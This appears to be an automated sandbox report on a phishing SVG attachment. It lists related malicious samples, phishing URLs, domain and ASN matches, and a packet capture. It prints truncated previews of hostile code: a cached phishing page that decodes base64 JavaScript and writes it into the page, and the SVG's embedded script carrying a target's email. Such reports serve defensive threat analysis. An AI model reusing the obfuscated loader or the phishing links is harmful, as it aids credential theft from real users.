                                            http://Voyages.CNTraveler.comGet hashmaliciousUnknownBrowse
                                            • cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
                                            104.18.94.41vRecording__118sec__Inwg00990__098.svgGet hashmaliciousUnknownBrowse
                                              https://eikosol.com/goto/https:/gamma.app/docs/Faber-nx9caa24p6tc1q6?mode=present#card-x3twj1va5159vpfGet hashmaliciousUnknownBrowse
                                                original (1).emlGet hashmaliciousUnknownBrowse
                                                  https://solaxxy.clickGet hashmaliciousHTMLPhisherBrowse
                                                    https://jupp.acGet hashmaliciousHTMLPhisherBrowse
                                                      3414736839.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                        https://u17065553.ct.sendgrid.net/ls/click?upn=u001.Rw-2FXpvWBRDxNoiEvv-2B0VhH0PbOaM-2FozlgiDV4KjxhypvjZewbywGZ4Q7g1wJEm8gOHO-2Fj-2Fy-2BeuUQs1H9VVa-2Brw-3D-3DA1Is_kVOBfQCxFG4-2FXIG8yX-2FGfqi8-2BWigF8C7RpBSvNc2aGXOogUEviQR-2F9AW4AqQYutZIq3lAWf2XC63-2F3cBIBI8SQcUp5qgb33TJa8U97ZQ5cQdCEnEMPutRmDhXXK795CYEJe8HbeAxSgjYkIC801CRDbuheOUeU7jpL2caFIX7m5r1-2BUeK2nHNMjrKykedf2hRgzpHe7uHe79N9sO-2B91JbIs4NZci-2F59qir2l6689wL8-3D&c=E,1,C_-9gUIHEPOk9L8PCpP9cCALx1hNX2e1W8H8gSQ9Qow47gwGLsMxgWEZPUB0mUA4ruJudoUOzX2dY5WML5U_JEKzPaJ-lLU-19K4Ky7KwAIqQSqy_58,&typo=1Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                          https://pell-network.websiteGet hashmaliciousHTMLPhisherBrowse
                                                            https://trias-migration.orgGet hashmaliciousHTMLPhisherBrowse
                                                              https://mertibet.topGet hashmaliciousUnknownBrowse

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                code.jquery.comView Remittance_18032025.PDF J8TLBF6.9 KB for R.bik.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 151.101.2.137
                                                                https://rpc-cryptolive.comGet hashmaliciousUnknownBrowse
                                                                • 151.101.130.137
                                                                3414736839.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 151.101.66.137
                                                                https://u17065553.ct.sendgrid.net/ls/click?upn=u001.Rw-2FXpvWBRDxNoiEvv-2B0VhH0PbOaM-2FozlgiDV4KjxhypvjZewbywGZ4Q7g1wJEm8gOHO-2Fj-2Fy-2BeuUQs1H9VVa-2Brw-3D-3DA1Is_kVOBfQCxFG4-2FXIG8yX-2FGfqi8-2BWigF8C7RpBSvNc2aGXOogUEviQR-2F9AW4AqQYutZIq3lAWf2XC63-2F3cBIBI8SQcUp5qgb33TJa8U97ZQ5cQdCEnEMPutRmDhXXK795CYEJe8HbeAxSgjYkIC801CRDbuheOUeU7jpL2caFIX7m5r1-2BUeK2nHNMjrKykedf2hRgzpHe7uHe79N9sO-2B91JbIs4NZci-2F59qir2l6689wL8-3D&c=E,1,C_-9gUIHEPOk9L8PCpP9cCALx1hNX2e1W8H8gSQ9Qow47gwGLsMxgWEZPUB0mUA4ruJudoUOzX2dY5WML5U_JEKzPaJ-lLU-19K4Ky7KwAIqQSqy_58,&typo=1Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 151.101.2.137
                                                                https://enervit.freshdesk.com/en/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 151.101.66.137
                                                                MT103__1825367420#U00e2__.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 151.101.130.137
                                                                https://sceanmcommnunmnlty.com/siute/apxpw/zpqGet hashmaliciousUnknownBrowse
                                                                • 151.101.194.137
                                                                http://email.mg.dior.com.sg/c/eJwUy0uOhCAQANDTwJLUBwpdsJiN9ygK6CZq7Dhmzj_pA7xWBKxq8r1gjsS4AoF_l8iAiWysYzGVPNZsFoEqqg1tMPwsBJSAccHMgByi1kXYgKXnLpFchPMV2rzuYNcZfl_-KO_n-Tj-cbQ52lRqNqw9dZVFmhgYpL6mHPTY5zM_1xc62vxddBwuwn620Hb_V-g_AAD__9XhM88&Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 151.101.66.137
                                                                FaxLine832699141Sharepoint_USIUIYLCJZ_attach.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 151.101.2.137
                                                                https://us.sa/xPuEbGet hashmaliciousUnknownBrowse
                                                                • 151.101.66.137
                                                                challenges.cloudflare.comvRecording__118sec__Inwg00990__098.svgGet hashmaliciousUnknownBrowse
                                                                • 104.18.94.41
                                                                https://eikosol.com/goto/https:/gamma.app/docs/Faber-nx9caa24p6tc1q6?mode=present#card-x3twj1va5159vpfGet hashmaliciousUnknownBrowse
                                                                • 104.18.94.41
                                                                View Remittance_18032025.PDF J8TLBF6.9 KB for R.bik.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 104.18.95.41
                                                                original (1).emlGet hashmaliciousUnknownBrowse
                                                                • 104.18.94.41
                                                                https://solaxxy.clickGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.18.94.41
                                                                https://jupp.acGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.18.95.41
                                                                3414736839.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 104.18.94.41
                                                                https://u17065553.ct.sendgrid.net/ls/click?upn=u001.Rw-2FXpvWBRDxNoiEvv-2B0VhH0PbOaM-2FozlgiDV4KjxhypvjZewbywGZ4Q7g1wJEm8gOHO-2Fj-2Fy-2BeuUQs1H9VVa-2Brw-3D-3DA1Is_kVOBfQCxFG4-2FXIG8yX-2FGfqi8-2BWigF8C7RpBSvNc2aGXOogUEviQR-2F9AW4AqQYutZIq3lAWf2XC63-2F3cBIBI8SQcUp5qgb33TJa8U97ZQ5cQdCEnEMPutRmDhXXK795CYEJe8HbeAxSgjYkIC801CRDbuheOUeU7jpL2caFIX7m5r1-2BUeK2nHNMjrKykedf2hRgzpHe7uHe79N9sO-2B91JbIs4NZci-2F59qir2l6689wL8-3D&c=E,1,C_-9gUIHEPOk9L8PCpP9cCALx1hNX2e1W8H8gSQ9Qow47gwGLsMxgWEZPUB0mUA4ruJudoUOzX2dY5WML5U_JEKzPaJ-lLU-19K4Ky7KwAIqQSqy_58,&typo=1Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 104.18.94.41
                                                                https://enervit.freshdesk.com/en/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 104.18.95.41
                                                                https://pell-network.websiteGet hashmaliciousHTMLPhisherBrowse
                                                                • 104.18.94.41
                                                                developers.cloudflare.comView Remittance_18032025.PDF J8TLBF6.9 KB for R.bik.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 104.16.3.189
                                                                3414736839.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 104.16.2.189
                                                                https://u17065553.ct.sendgrid.net/ls/click?upn=u001.Rw-2FXpvWBRDxNoiEvv-2B0VhH0PbOaM-2FozlgiDV4KjxhypvjZewbywGZ4Q7g1wJEm8gOHO-2Fj-2Fy-2BeuUQs1H9VVa-2Brw-3D-3DA1Is_kVOBfQCxFG4-2FXIG8yX-2FGfqi8-2BWigF8C7RpBSvNc2aGXOogUEviQR-2F9AW4AqQYutZIq3lAWf2XC63-2F3cBIBI8SQcUp5qgb33TJa8U97ZQ5cQdCEnEMPutRmDhXXK795CYEJe8HbeAxSgjYkIC801CRDbuheOUeU7jpL2caFIX7m5r1-2BUeK2nHNMjrKykedf2hRgzpHe7uHe79N9sO-2B91JbIs4NZci-2F59qir2l6689wL8-3D&c=E,1,C_-9gUIHEPOk9L8PCpP9cCALx1hNX2e1W8H8gSQ9Qow47gwGLsMxgWEZPUB0mUA4ruJudoUOzX2dY5WML5U_JEKzPaJ-lLU-19K4Ky7KwAIqQSqy_58,&typo=1Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 104.16.2.189
                                                                https://enervit.freshdesk.com/en/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 104.16.2.189
                                                                MT103__1825367420#U00e2__.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 104.16.6.189
                                                                http://email.mg.dior.com.sg/c/eJwUy0uOhCAQANDTwJLUBwpdsJiN9ygK6CZq7Dhmzj_pA7xWBKxq8r1gjsS4AoF_l8iAiWysYzGVPNZsFoEqqg1tMPwsBJSAccHMgByi1kXYgKXnLpFchPMV2rzuYNcZfl_-KO_n-Tj-cbQ52lRqNqw9dZVFmhgYpL6mHPTY5zM_1xc62vxddBwuwn620Hb_V-g_AAD__9XhM88&Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 104.16.6.189
                                                                FaxLine832699141Sharepoint_USIUIYLCJZ_attach.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 104.16.5.189
                                                                ATT61918.svgGet hashmaliciousInvisible JS, Tycoon2FABrowse
                                                                • 104.16.5.189
                                                                ATT61918.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 104.16.2.189
                                                                Munsch-Employee-Handbook.pdfGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 104.16.4.189
                                                                cdnjs.cloudflare.comhttps://vardhadevelco.com/365confirmation.phpGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                • 104.17.25.14
                                                                View Remittance_18032025.PDF J8TLBF6.9 KB for R.bik.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 104.17.24.14
                                                                https://opensea-nftpro5-eight.vercel.appGet hashmaliciousUnknownBrowse
                                                                • 104.17.24.14
                                                                3414736839.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 104.17.25.14
                                                                https://u17065553.ct.sendgrid.net/ls/click?upn=u001.Rw-2FXpvWBRDxNoiEvv-2B0VhH0PbOaM-2FozlgiDV4KjxhypvjZewbywGZ4Q7g1wJEm8gOHO-2Fj-2Fy-2BeuUQs1H9VVa-2Brw-3D-3DA1Is_kVOBfQCxFG4-2FXIG8yX-2FGfqi8-2BWigF8C7RpBSvNc2aGXOogUEviQR-2F9AW4AqQYutZIq3lAWf2XC63-2F3cBIBI8SQcUp5qgb33TJa8U97ZQ5cQdCEnEMPutRmDhXXK795CYEJe8HbeAxSgjYkIC801CRDbuheOUeU7jpL2caFIX7m5r1-2BUeK2nHNMjrKykedf2hRgzpHe7uHe79N9sO-2B91JbIs4NZci-2F59qir2l6689wL8-3D&c=E,1,C_-9gUIHEPOk9L8PCpP9cCALx1hNX2e1W8H8gSQ9Qow47gwGLsMxgWEZPUB0mUA4ruJudoUOzX2dY5WML5U_JEKzPaJ-lLU-19K4Ky7KwAIqQSqy_58,&typo=1Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 104.17.24.14
                                                                https://enervit.freshdesk.com/en/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 104.17.24.14
                                                                https://changelly.clickGet hashmaliciousUnknownBrowse
                                                                • 104.17.25.14
                                                                MT103__1825367420#U00e2__.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 104.17.24.14
                                                                https://avax-sushi.comGet hashmaliciousUnknownBrowse
                                                                • 104.17.25.14
                                                                https://aivptjn.top/hwujkGet hashmaliciousUnknownBrowse
                                                                • 104.17.24.14

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CLOUDFLARENETUSDoc93847023000200009.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.74.152
                                                                CONFIDENTIAL_PAYMENT_CONFIRMATION_TRANSACTION_DETAILS_03224.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.74.152
                                                                ICSCertifikat153609921.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.44.128
                                                                Certifikat_153600814.exeGet hashmaliciousFormBookBrowse
                                                                • 172.67.199.251
                                                                https://viking-safe-lock.webflow.io/Get hashmaliciousUnknownBrowse
                                                                • 104.18.160.117
                                                                vRecording__118sec__Inwg00990__098.svgGet hashmaliciousUnknownBrowse
                                                                • 104.21.90.236
                                                                KTUlWpH5Dh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 104.21.32.1
                                                                SecuriteInfo.com.Win32.RATX-gen.23255.10701.exeGet hashmaliciousDarkTortilla, LummaC StealerBrowse
                                                                • 172.67.185.195
                                                                REMITTANCE ADVICE Itsecurity.svgGet hashmaliciousUnknownBrowse
                                                                • 172.67.179.211
                                                                test.batGet hashmaliciousUnknownBrowse
                                                                • 172.67.181.225
                                                                CLOUDFLARENETUSDoc93847023000200009.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.74.152
                                                                CONFIDENTIAL_PAYMENT_CONFIRMATION_TRANSACTION_DETAILS_03224.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.74.152
                                                                ICSCertifikat153609921.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.44.128
                                                                Certifikat_153600814.exeGet hashmaliciousFormBookBrowse
                                                                • 172.67.199.251
                                                                https://viking-safe-lock.webflow.io/Get hashmaliciousUnknownBrowse
                                                                • 104.18.160.117
                                                                vRecording__118sec__Inwg00990__098.svgGet hashmaliciousUnknownBrowse
                                                                • 104.21.90.236
                                                                KTUlWpH5Dh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 104.21.32.1
                                                                SecuriteInfo.com.Win32.RATX-gen.23255.10701.exeGet hashmaliciousDarkTortilla, LummaC StealerBrowse
                                                                • 172.67.185.195
                                                                REMITTANCE ADVICE Itsecurity.svgGet hashmaliciousUnknownBrowse
                                                                • 172.67.179.211
                                                                test.batGet hashmaliciousUnknownBrowse
                                                                • 172.67.181.225
                                                                FASTLYUSvRecording__118sec__Inwg00990__098.svgGet hashmaliciousUnknownBrowse
                                                                • 151.101.129.229
                                                                Final Contract document.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                • 199.232.196.193
                                                                https://www.villanaxamena.comGet hashmaliciousUnknownBrowse
                                                                • 185.199.109.153
                                                                View Remittance_18032025.PDF J8TLBF6.9 KB for R.bik.svgGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                • 151.101.2.137
                                                                ImageG.exe.bin.exeGet hashmaliciousNovaSentinelBrowse
                                                                • 185.199.111.133
                                                                https://github.com/olivierfriard/BORIS/releases/download/v9.1.1/boris-9.1.1-win64-setup.exeGet hashmaliciousUnknownBrowse
                                                                • 185.199.111.133
                                                                ImageG.exe.bin.exeGet hashmaliciousNovaSentinelBrowse
                                                                • 185.199.111.133
                                                                https://rpc-cryptolive.comGet hashmaliciousUnknownBrowse
                                                                • 151.101.130.137
                                                                https://opensea-nftpro5-eight.vercel.appGet hashmaliciousUnknownBrowse
                                                                • 151.101.193.229
                                                                https://multidappschain.vercel.appGet hashmaliciousUnknownBrowse
                                                                • 151.101.129.229
                                                                CLOUDFLARENETUSDoc93847023000200009.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.74.152
                                                                CONFIDENTIAL_PAYMENT_CONFIRMATION_TRANSACTION_DETAILS_03224.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.74.152
                                                                ICSCertifikat153609921.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.44.128
                                                                Certifikat_153600814.exeGet hashmaliciousFormBookBrowse
                                                                • 172.67.199.251
                                                                https://viking-safe-lock.webflow.io/Get hashmaliciousUnknownBrowse
                                                                • 104.18.160.117
                                                                vRecording__118sec__Inwg00990__098.svgGet hashmaliciousUnknownBrowse
                                                                • 104.21.90.236
                                                                KTUlWpH5Dh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                • 104.21.32.1
                                                                SecuriteInfo.com.Win32.RATX-gen.23255.10701.exeGet hashmaliciousDarkTortilla, LummaC StealerBrowse
                                                                • 172.67.185.195
                                                                REMITTANCE ADVICE Itsecurity.svgGet hashmaliciousUnknownBrowse
                                                                • 172.67.179.211
                                                                test.batGet hashmaliciousUnknownBrowse
                                                                • 172.67.181.225

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                Chrome Cache Entry: 51

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65447)
                                                                Category:downloaded
                                                                Size (bytes):65536
                                                                Entropy (8bit):5.291341878948596
                                                                Encrypted:false
                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdx:DIh8GgP3hujzwbhdx
                                                                MD5:6C4675CF3DF7F93BF4849E1D58E6C158
                                                                SHA1:657014EB75249D31008B213FCD81130B7176D496
                                                                SHA-256:9F567EC6BEA5A905D8A9F583B525A0E1866813F3B78B4B9F901F60F4EFB2378B
                                                                SHA-512:31F0BDF3D65F5E491D5CE538C207472290BED40E9B6D9B2721193CE9D5A3B550E6DB73A91CCA00A837E2B383B8133A8393EB1C0F5D1F3416628159DFD1C33D9F
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

                                                                Chrome Cache Entry: 52

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (33593), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):33593
                                                                Entropy (8bit):5.35293724210004
                                                                Encrypted:false
                                                                SSDEEP:768:+CbPzHMb42QOna0rhgaqC2DdONTjwzsLSp:gb425na0rhgaqDnzsE
                                                                MD5:C6D221C5EFB73B48506DDDE16534DA7E
                                                                SHA1:E745B43F786815C23A7FBCF70135FDDD2EEC4029
                                                                SHA-256:3A4F3E0F0DF789995EF471CC667AC5142347F1E93EEBA19243E69CE3DA63933C
                                                                SHA-512:66F4A286ADEF2EB66C5F78972C11C8F6495B30CB506F337E82933FA0A65E35788443E7628CE94872050342802ECB1228BAA195DD9D1F71ABC1F87C5B23D75DC1
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                                                Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

                                                                Chrome Cache Entry: 53

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (65364)
                                                                Category:downloaded
                                                                Size (bytes):198147
                                                                Entropy (8bit):4.741864178065632
                                                                Encrypted:false
                                                                SSDEEP:1536:tpy5WSb8fcMs8oBM3wMnnAzgw17dKD1Cpy5WSb8fcMs8oBM3wMnnAzgw17dKD14a:ix8fcMs853znYwx8fcMs853znYzcH
                                                                MD5:4DB20851D4642F5FD583B5878D3869B0
                                                                SHA1:9ADFCA39DD43383B45901AB3EE35E2078887684C
                                                                SHA-256:1F17B9005B7202759563F8CBD29AD5A47FAAB30A149C402CD62C876AACF2EBE6
                                                                SHA-512:60E3B91FE90D9019FE404F069E953117F8607A56EA2CC385BE517453A9F4FD46CCCB0EB84B8BACEFEA850EB158BBD408D9DA72B0AAA31FC5FF8468B781C3B5C2
                                                                Malicious:false
                                                                Reputation:low
                                                                URL:https://abdxo.qdhfwaes.es/JYVwg6/
                                                                Preview:<script>.wKoshZnoZx = atob("aHR0cHM6Ly9CaU8ucWRoZndhZXMuZXMvSllWd2c2Lw==");.zZzVawUtZD = atob("bm9tYXRjaA==");.TxvbDnvnSC = atob("d3JpdGU=");.if(wKoshZnoZx == zZzVawUtZD){.document[TxvbDnvnSC](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9kZXZlbG9wZXJzLmNsb3VkZmxhcmUuY29tL2Zhdmljb24ucG5nIiB0eXBlPSJpbWFnZS94LWljb24iPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPgogICAgPHNjcmlwdD4KICAgIGNvbnN0IGNURVNPTXR4b0UgPSB7CiAgZ2V0KFFoSkdUUGhvTXIsIHNweEV0UFRSa1gpIHsKICAgIGNvbnN0IFBYY0tuQkhaSlAgPSBbLi4uc3B4RXRQVFJrWF0KICAgICAgLm1hcChVZ2pTSU1XaGdSID0+ICsoJ+++oCcgPiBVZ2pTSU1XaGdSKSkKICAgICAgLmpvaW4oJycpOwogICAgY29uc3QgYnB1dENudWtXeSA9IFBYY0tuQkhaSlAucmVwbGFjZSgvLns4fS9nLCBEcHlpYWpOc1F

                                                                Static File Info

                                                                General

                                                                File type:SVG Scalable Vector Graphics image
                                                                Entropy (8bit):3.883290126543491
                                                                TrID:
                                                                • Scalable Vector Graphics (18501/1) 78.71%
                                                                • Generic XML (ASCII) (5005/1) 21.29%
                                                                File name:View Remittance_18_032025.PDF J8TLBF6.9 KB for Tomdrackett.svg
                                                                File size:2'699 bytes
                                                                MD5:41618a9a79500a02f2ce111361e2c5a0
                                                                SHA1:e649faa25b0e522bb8498cf146f3e085aebeae23
                                                                SHA256:47631be11d823ac5135803c5f95782c355bca742a5bc6038039ea6e526fae9b7
                                                                SHA512:4716c9c1bc9253133dc3b51ce6d88dc44770a460ada52602f405b1dfcc3b4360ec4adfe7e0167891523934aaecaadede7d52b3b9bff200876281b2befc308f36
                                                                SSDEEP:24:2dtkOoVqqA8yQAiNtziCGxjksOPfYLhGLEm7X4Dt9IM3vaxgxWUaGa+AbEMU:cklF/idjkPPfYFGAQ4D/IMSxeXs7U
                                                                TLSH:EB510ADB62CC6F604AD0A05CF8AF73024D64DD73F57B584971840772C6940639F759AB
                                                                File Content Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<svg xmlns="http://www.w3.org/2000/svg" width="400" height="250">..<script>..<![CDATA[..GvCLRnfzmMmzhy = "#Mtomdrackett@mangrovelithium.com";..class XuIjlH { constructor({ AtYHfe, DtaMDh }) { this.At

                                                                File Icon

                                                                Icon Hash:173149cccc490307

                                                                Network Behavior

                                                                Download Network PCAP: filteredfull

                                                                Network Port Distribution

                                                                • Total Packets: 236
                                                                • 443 (HTTPS)
                                                                • 53 (DNS)
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Mar 19, 2025 17:55:45.697678089 CET49692443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:55:45.697726011 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:45.697803974 CET49692443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:55:45.699193954 CET49692443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:55:45.699209929 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:45.759455919 CET4969453192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:45.764318943 CET53496941.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:45.764406919 CET4969453192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:45.764509916 CET4969453192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:45.764523029 CET4969453192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:45.764560938 CET4969453192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:45.769216061 CET53496941.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:45.769227028 CET53496941.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:45.811856985 CET53496941.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:46.371030092 CET53496941.1.1.1192.168.2.16
                                                                Mar 19, 2025 17:55:46.371125937 CET4969453192.168.2.161.1.1.1
                                                                Mar 19, 2025 17:55:46.494699955 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:46.494772911 CET49692443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:55:46.497414112 CET49692443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:55:46.497423887 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:46.497725010 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:46.498212099 CET49692443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:55:46.540327072 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:47.086195946 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:47.086260080 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:47.086298943 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:47.086325884 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:47.086329937 CET49692443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:55:47.086357117 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:47.086402893 CET49692443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:55:47.086704969 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:47.086760044 CET49692443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:55:47.086767912 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:47.086925983 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:47.086978912 CET49692443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:55:47.086987019 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:47.128690958 CET49692443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:55:47.235825062 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:47.235888004 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:47.235924959 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:47.235960007 CET49692443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:55:47.235989094 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:47.236042023 CET49692443192.168.2.16188.114.96.3
                                                                Mar 19, 2025 17:55:47.236331940 CET44349692188.114.96.3192.168.2.16
                                                                Mar 19, 2025 17:55:47.236423969 CET44349692188.114.96.3192.168.2.16
